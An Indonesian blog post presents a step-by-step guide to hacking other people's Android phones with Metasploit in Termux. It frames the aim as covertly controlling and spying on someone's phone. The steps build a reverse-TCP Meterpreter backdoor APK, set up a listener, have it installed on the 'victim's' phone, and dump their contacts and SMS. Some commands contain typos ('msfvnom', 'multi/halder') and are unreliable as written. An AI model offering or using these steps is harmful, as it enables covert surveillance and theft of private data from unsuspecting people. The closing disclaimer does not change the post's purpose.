Cara Hack HP Dengan Metasploit 2024

Cara Hack HP Dengan Metasploit
Bagi anda yang mungkin pada saat ini sedang mencari cara hack hp dengan metasploit berarti anda masuk ke dalam artikel yang tepat, karena kami sudah menyediakan pembahasannya untuk anda di bawah ini.

Tidak sedikit yang ingin sekali mengetahui bagaimana cara untuk bisa mengendalikan handphone orang lain tanpa harus takut ketahuan dengan menggunakan aplikasi Termux.

Dengan melakukan peretasan handphone seseorang anda bisa mengetahui semua aktivitas yang dilakukan dan untuk kepentingan mereka.

Walaupun begitu, tidak sedikit juga yang mengeluhkan sebelum mencoba teknik tersebut dikarenakan mereka terbayang bagaimana akan kerumitan coding pada saat akan melakukan penyadapan handphone orang lain.

Apakah anda pernah berfikir melakukan penyadapan itu sulit dilakukan? Nayatanya untuk bisa melakukan peretasan terhadap orang lain bisa anda lakukan tanpa menggunakan coding.

Salah satu cara yang bisa anda lakukan untuk melakukan penyadapan perangkat handhone orang lain adalah dengan menggunakan aplikasi Metasploit.

Mungkin beberapa dari anda masih ada saja yang belum mengetahui apa sebenarnya aplikasi Metasploit tersebut? Kami akan jelasnya untuk anda.

Metasploit merupakan sebuah proyek kemanan komputer yang sudah menyediakan informasi mengenai kerentanan keamanan dan juga bisa membantu dalam melakukan pengujian penetrasi pengembangan signature IDS.

Sebagai Software security yang sudah sangat sering digunakan untuk melakukan pengujuan ketahanan suatu sistem, rupasanya aplikasi tersebut juga memiliki beberapa proyek sub.

Hal tersebut biasanya dilakukan dengan cara mengeskploitasi kelemahan software dari suatu sistem yang dimiliki.

Sebagai aplikasi atau proyek yang dikembangkan oelh Rapid7, aplikasi metasploit sudah berhasil mengembangkan sistem yang menyediakan informasi mengenai suatu keamanan dari komputer.

Selain itu, juga sudah berhasil mengembangkan Source Code yang bisa memungkinkan suatu pada jaringan tersebut.

Aplikasi yang satu ini juga terkadang bisa menjadi software penyerang ke dalam sistem komputer yang sedang mencari kelamahan dalam keamanannya.

Hal tersebut tentunya untuk bisa mendapatkan akses ke dalam data dan juga Fitur-fitur dari perangkat komputer tersebut.

Proyek yang paling terkenal yaitu Metasploit Framework yang merupakan sebuah platform perangkat lunah yang digunakan untuk menguju, mengembangkan dan juga melaksanakan eksploitasi.

Pada awalnya perangkat lunak tersebut diciptakan sebagai lata jaringan portabel oleh HD Moore pada tahun 2003.

Dan sudah diakusisi oleh perusahaan keamanan jaringan Rapid7 pada tahun 2009, informasi tersebut kami dapatkan dari TechTarget.

Untuk lebih jelasnya, silahkan anda bisa langsung saja simak ulasan mengenai cara hack hp dengan metasploit yang sudah ada di bawah ini sampai selesai yaa gess yaa!!!

Cara Hack HP Dengan Metasploit dengan Menggunakan Aplikasi Termux Terbaru

Cara Hack HP Dengan Metasploit
Cara Hack HP Dengan Metasploit dengan Menggunakan Aplikasi Termux Terbaru
Metasploit sendiri merupakan sebuah alat yang dibuat untuk melakukan pengujian kerentanan suatu sistem atau masuk ke dalam sistem remote dengan jarak jauh.

Namun, sebelum anda masuk ke dalam proses hack perangkat handphone orang lain, pastikan terlebih dahulu apakah sistem terget hack yang anda inginkan rentan terhadap metasploit atau tidak.

Apabila sistem perangkat tersebut rentan terhadap metasploit, maka proses hack pun bisa jauh lebih mudah untuk dilakukan dan tingkat keberhasilannya jauh lebih tinggi.

Untuk bisa menjalankan proses hack dengan menggunakan metasploit, anda juga harus mendownload aplikasi Termux yaa guys, karena keduanya mempunyai hubungan yang erat.

Pada dasarnya, aplikasi Termux merupakan sebuah aplikasi emulator terminal untuk android dan juga Linux Environment yang berjalan pada perangkat Android tanpa harus melakukan rooting atau pengaturan khusus lainnya.

Yang membedakan aplikasi Termux dengan aplikasi emulator terminal yang lainnya adalah Termux sudah di atur sedemikian rupa sehingga environment yang ada pada Termux sama dengan environment Linux Debian.

Dikarenakan environment android berbeda dengan environment Linux pada umumnya maka pada aplikasi Termux anda bisa langsung saja menginstall paket atau tools yang biasanya digunakan pada sistem operasi Linux pada umumnya.

Dengan adanya fitur dan juga pengaturan environment seperti yang sudah kami katakan di atas yang membuat aplikasi Termux ini menjadi sangat spesial karena anda bisa menginstall Penetration Testing Tools atau tool hacking seperti Metasploit dan juga net hunter pada perangkat handphone android anda menggunakan Termux.

Apabila beberapa persyaratan sudah disediakan, maka anda bisa langsung saja masuk ke dalam proses hack yang akan dilakukan yaa guyss.

Silahkan anda bisa langsung saja simak langkah-langkah mengenai cara hack hp dengan metasploit yang sudah ada di bawah ini, yaitu sebagai berikut:
  • Tahap pertama yang harus anda lakukan adalah download aplikasi Termux melalui link yang sudah kami sediakan untuk anda berikut ini (Download Aplikasi Termux untuk Android).
  • Anda bisa langsung saja install aplikasi termux tersebut ke dalam perangkat anda.
  • Setelah itu anda bisa langsung melakukan pengecekkan IP anda dengan mengetikkan ifconfig, contoh dengan menggunakan IP kami 192.168.43.230.
  • Untuk Backdoor anda hanya tinggal memasukkan perintah msfvnom -p android/meterpreter/reverse_tcp LHOST=(IP anda) LPORT=4444 R> andro.apk, dan masukkanlah IP anda tanpa menggunakan tanda kurung.
  • Kemudian anda tinggal memberikan hak akses untuk Backdoor anda dengan menggunakan perintah chmod 777 andro.apk.
  • Lalu, anda bisa lanjutkan dengan membuka aplikasi Metasploitnya dengan menggunakan perintah msfconsole.
  • Berikutnya, anda tinggal mengaktifkan Exploit multi halder, caranya hanya dengan memasukkan perintah use multi/halder.
  • Jangan lupa juga untuk mengaktifkan payloadnya dengan memasukkan perintah set payload android/meterpreter/reverse_tcp.
  • Selanjutnya, anda tinggal Set IP anda dengan menggunakan atau memasukkan perintah set LHOST 192.168.43.230 dan anda lanjutkan dengan memasukkan IP yang sesuai dengan step nomor 1 yaa guyss.
  • Tahap selanjutnya anda tinggal set portnya dengan memasukkan perintah set LPORT 4444.
  • Dilanjutkan dengan menjalankan Exploitnya hanya dengan memasukkan perintah exploit.
  • Jika sudah selesai, sekarang tugas anda hanya menginstall backdoor tadi ke dalam perangkat handphone korban anda, USE YOUR BRAIN.
  • Ketikkan help dan enter untuk bisa mengetahui perintah apa saja yang bisa digunakan.
  • Untuk melihat isi dari kontak yang ada dalam perangkat handphone korban anda bisa memasukkan perintah dump_contacts.
  • Yang terakhir, jika anda ingin melihat SMS yang ada dalam handphone korban anda bisa memasukkan kode perintah dump_sms.
  • Selesai!!!
Sangat mudah sekali bukan cara untuk melakukan pembobolan perangkat handphone orang lain dengan menggunakan aplikasi metasploit yang bisa langsung anda terapkan.

Akhir Kata

Demikianlah segala penjabaran mengenai cara hack hp dengan metasploit yang bisa kami berikan untuk anda terapkan dengan sangat mudah loh guys.

Kami ingatkan untuk anda jangan pernah menggunakan cara yang sudah kami berikan untuk melakukan tindakan yang bisa merugikan banyak pihak, tetaplah bijak dalam mengembil tindakan.

Bila anda rasa ulasan yang sudah kami berikan di atas penting, maka anda jangan lupa juga untuk membagikannya ke teman ataupun keraba anda yang belum mengetahuinya.

Itulah dia semua pembahasan pada kali ini yang bisa kami sampaikan, sekian dan semoga bermanfaat untuk anda dan selamat mencoba yaa gess yaa.
Dody S. Technology article editor, IT consultant. has been involved in the website and technology sector since 2017.

Tidak ada komentar:

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel